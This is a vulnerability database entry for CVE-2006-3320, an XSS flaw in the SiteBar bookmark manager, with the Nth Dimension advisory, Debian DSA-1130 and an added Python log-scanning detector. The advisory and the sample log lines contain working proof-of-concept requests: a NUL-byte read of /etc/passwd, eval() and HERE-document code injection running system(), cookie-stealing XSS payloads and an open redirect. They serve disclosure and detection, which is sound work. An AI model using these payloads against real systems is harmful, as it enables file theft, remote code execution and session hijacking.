CVE-2006-3320
CVSS 2.6
Published: 2006-06-29 21:05:00
Last modified: 2011-03-07 21:38:21

[Original] Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the command parameter.


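[CNNVD] SiteBar Command.PHP cross-site scripting vulnerability (CNNVD-200606-603)

        Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier. Remote attackers can inject arbitrary web script or HTML via the command parameter.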

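- CVSS (base score)

CVSS score: 2.6 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on the availability of the system]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]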

- CPE (affected platforms and products)

cpe:/a:sitebar:sitebar:3.3.7
cpe:/a:sitebar:sitebar:3.3.3
cpe:/a:sitebar:sitebar:3.3.5
cpe:/a:sitebar:sitebar:3.3.4
cpe:/a:sitebar:sitebar:3.3.8
cpe:/a:sitebar:sitebar:3.3.6
cpe:/a:sitebar:sitebar:3.3.2

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3320
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3320
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-603
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/27421
(UNKNOWN)  XF  sitebar-command-xss(27421)
http://www.vupen.com/english/advisories/2006/2568
(UNKNOWN)  VUPEN  ADV-2006-2568
http://www.securityfocus.com/bid/18680
(UNKNOWN)  BID  18680
http://www.securityfocus.com/archive/1/archive/1/438464/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060627 [Kurdish Security # 11] SiteBar Cross-Site Scripting
http://secunia.com/advisories/20841
(VENDOR_ADVISORY)  SECUNIA  20841
http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
(UNKNOWN)  MISC  http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
http://www.securityfocus.com/bid/26126
(UNKNOWN)  BID  26126
http://www.securityfocus.com/archive/1/archive/1/482499/100/0/threaded
(UNKNOWN)  BUGTRAQ  20071018 Serious holes affecting SiteBar 3.3.8
http://www.osvdb.org/26869
(UNKNOWN)  OSVDB  26869
http://www.debian.org/security/2006/dsa-1130
(UNKNOWN)  DEBIAN  DSA-1130
http://teamforge.net/viewcvs/viewcvs.cgi/tags/release-3.3.9/doc/history.txt?view=markup
(UNKNOWN)  CONFIRM  http://teamforge.net/viewcvs/viewcvs.cgi/tags/release-3.3.9/doc/history.txt?view=markup
http://securityreason.com/securityalert/1174
(UNKNOWN)  SREASON  1174
http://secunia.com/advisories/21248
(UNKNOWN)  SECUNIA  21248

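- Vulnerability information

SiteBar Command.PHP cross-site scripting vulnerability
Low risk  Cross-site scripting
2006-06-29 00:00:00 2006-07-03 00:00:00
Remote
        Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier. Remote attackers can inject arbitrary web script or HTML via the command parameter.

- Advisories and patches

        No data available

- Vulnerability information (F60265)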

NDSA20071016.txt (PacketStormID:F60265)
2007-10-22 00:00:00
Tim Brown  nth-dimension.org.uk
exploit,remote,web,arbitrary,javascript
CVE-2006-3320,CVE-2007-5492,CVE-2007-5491

Nth Dimension Security Advisory (NDSA20071016) - The SiteBar application has single high risk issues with its translation module. It can be made to retrieve any file to which the web server user has read access. The SiteBar application has multiple high risk issues with its translation module. It can be made to execute arbitrary code to gain remote access as the web server user typically nobody. The SiteBar application has multiple medium risk issues where it is vulnerable to Javascript injection within the requested URL. The SiteBar application has single medium risk issue where it is vulnerable to malicious redirects within the requested URL. Version 3.3.8 is affected.


Nth Dimension Security Advisory (NDSA20071016)
Date: 16th October 2007
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: SiteBar 3.3.8 <http://www.sitebar.org/>
Vendor: Ondřej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/>
Risk: High

Summary

This advisory comes in 4 related parts:

1) SiteBar application has single high risk issues with its translation
module.  It can be made to retrieve any file to which the web server user
has read access.

2) SiteBar application has multiple high risk issues with its translation
module.  It can be made to execute arbitrary code to gain remote access
as the web server user typically nobody.

3) SiteBar application has multiple medium risk issues where it is vulnerable
to Javascript injection within the requested URL.

4) SiteBar application has single medium risk issue where it is vulnerable to
malicious redirects within the requested URL.

Technical Details

1) The SiteBar application translation module can be made to read any
arbitrary file that the web server user has read access to, as it makes
no sanity checks on the value passed within the dir parameter of the URL,
for example:

http://192.168.1.1/translator.php?dir=/etc/passwd%00

Note the use of %00 to terminate the malicious and so prevent the intended
string concatenation occurring.

2) The SiteBar application translation module can be forced into code
execution in one of two ways.  Firstly, it makes no sanity checks
on the value passed within the edit parameter prior to using the value as
part of an eval() call, for example:

http://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);

Secondly, whilst modifying strings within a translation, it makes no sanity
checks on the value passed for a given string to be embedded within a HERE
document within the languages strings library.  It is therefore possible to
terminate the HERE document and pass arbitrary code which will be executed
whenever the languages strings library is included, for example:

POST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/translator.php?lang=test&edit=text
Cookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539
Content-Type: application/x-www-form-urlencoded
Content-length: 47497

dir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P;

system('id');

?>

Note that _P terminates the HERE document.

3) The values of the URL requested are used within the web pages returned
by the various scripts, in their unsanitised form.  Specifically, it makes
no sanity checks on the value passed within the multiple parameters of the
URL, for example:

http://192.168.1.1/integrator.php?lang="><script>alert('xss')</script> - Allows '
http://192.168.1.1/command.php?command=New+Password&uid=&token="><script>alert(document.cookie)</script> - Does not allow '
http://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320.
http://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows '

Note that CVE-2006-3320 had not been resolved at the time of testing, in
September 2007, and so we included it in our vulnerability report to the vendor
for completeness.

4) Finally, the SiteBar can be made to redirect users to malicious locations,
as it makes no checks on the value passed within the forward parameter of the URL,
for example:

http://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/

Solutions

Following vendor notification on the 27th September 2007, the vendor promptly
responded with an initial patch on the 7th October which has been attached along
with this advisory and which resolved the reported issues.  Nth Dimension would
recommend applying this patch as soon as possible.  Alternatively, from 3.3.9
(available at http://sitebar.org/downloads.php) onwards also include this patch.
Nth Dimension would like to thank Ondraj from the SiteBar team for the way he
worked to resolve the issue.
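
Added example (not part of the advisory or of SiteBar's own code): a Python heuristic that flags web-server access-log requests matching the four request patterns the advisory above describes for translator.php and command.php. The host name `bookmarks.example` and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']")  # characters used to break out of HTML context

def classify(target, site_host="bookmarks.example"):  # site_host: assumed own host
    """Return the advisory part numbers (1-4) that a request target matches."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if script == "translator.php" and name == "dir":
            # Part 1: NUL byte, absolute path or traversal in the dir parameter
            if "\x00" in value or value.startswith("/") or ".." in value:
                hits.add(1)
        if script == "translator.php" and name == "edit":
            # Part 2: edit reaches eval(), so anything but a plain word is suspect
            if not re.fullmatch(r"\w*", value):
                hits.add(2)
        if MARKUP.search(value):
            # Part 3: HTML metacharacters in a parameter that may be reflected
            hits.add(3)
        if script == "command.php" and name == "forward":
            # Part 4: forward naming a host other than our own
            host = urlsplit(value).netloc
            if host and host != site_host:
                hits.add(4)
    return sorted(hits)

def scan(log_lines):
    """Map each suspicious request target to the advisory parts it matches."""
    findings = {}
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (issues := classify(m.group(1))):
            findings[m.group(1)] = issues
    return findings

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Oct/2007:10:00:01 +0000] "GET /translator.php?dir=/etc/passwd%00 HTTP/1.1" 200 512',
    '203.0.113.5 - - [20/Oct/2007:10:00:02 +0000] "GET /translator.php?lang=test&edit=text%3Bf%28%29 HTTP/1.1" 200 90',
    '203.0.113.5 - - [20/Oct/2007:10:00:03 +0000] "GET /command.php?command=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 733',
    '203.0.113.5 - - [20/Oct/2007:10:00:04 +0000] "GET /command.php?command=Log%20In&forward=http://www.google.com/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [20/Oct/2007:10:00:05 +0000] "GET /command.php?command=Log+In&forward=index.php HTTP/1.1" 200 810',
]

if __name__ == "__main__":
    for target, issues in scan(SAMPLE_LOG).items():
        print(issues, target)
```

The second technique in part 2 arrives in a POST body, which access logs do not record, so this check only covers the query-string cases.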
    

- Vulnerability information (F48986)

Debian Linux Security Advisory 1130-1 (PacketStormID:F48986)
2006-08-17 00:00:00
Debian  debian.org
advisory,remote,web,arbitrary,php,xss
linux,debian
CVE-2006-3320

Debian Security Advisory 1130-1 - A cross-site scripting vulnerability has been discovered in sitebar, a web based bookmark manager written in PHP, which allows remote attackers to inject arbitrary web script or HTML.


--------------------------------------------------------------------------
Debian Security Advisory DSA 1130-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
July 30th, 2006                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : sitebar
Vulnerability  : missing input validation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3320
BugTraq ID     : 18680
Debian Bug     : 377299

A cross-site scripting vulnerability has been discovered in sitebar,
a web based bookmark manager written in PHP, which allows remote
attackers to inject arbitrary web script or HTML.

For the stable distribution (sarge) this problem has been fixed in
version 3.2.6-7.1.

For the unstable distribution (sid) this problem has been fixed in
version 3.3.8-1.1.

We recommend that you upgrade your sitebar package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1.dsc
      Size/MD5 checksum:      567 af6299567258255742c9289ead8618e4
    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1.diff.gz
      Size/MD5 checksum:     9214 2309667ac14ea821c7a1ba14b8a59916
    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6.orig.tar.gz
      Size/MD5 checksum:   333352 a86243f7a70a1a9ac80342fbcca14297

  Architecture independent components:

    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1_all.deb
      Size/MD5 checksum:   339760 98d388ce2b2c8d746d333f6286e22c0b


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>


    

- Vulnerability information

26869
SiteBar command.php command Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

SiteBar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'command' variable upon submission to the command.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2006-06-27 Unknown
2006-06-27 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

SiteBar Command.PHP Cross-Site Scripting Vulnerability
Input Validation Error 18680
Yes No
2006-06-27 12:00:00 2007-10-24 03:37:00
Kurdish security is credited with the discovery of this vulnerability.

- Affected program versions

SiteBar SiteBar 3.3.8
SiteBar SiteBar 3.3.7
SiteBar SiteBar 3.3.6
SiteBar SiteBar 3.3.5
SiteBar SiteBar 3.3.4
SiteBar SiteBar 3.3.3
SiteBar SiteBar 3.3.2
SiteBar SiteBar 3.2.6
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
SiteBar SiteBar 3.3.9

- Unaffected program versions

SiteBar SiteBar 3.3.9

- Vulnerability discussion

SiteBar is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

- Exploit

Attackers can exploit this issue by enticing a victim user into following a malicious URI.

An example URI has been provided.

- Solution

The vendor released SiteBar 3.3.9 to address this issue. Please see the references for more information.


SiteBar SiteBar 3.2.6

SiteBar SiteBar 3.3.2

SiteBar SiteBar 3.3.3

SiteBar SiteBar 3.3.4

SiteBar SiteBar 3.3.5

SiteBar SiteBar 3.3.6

SiteBar SiteBar 3.3.7

SiteBar SiteBar 3.3.8

- Related references

 

 
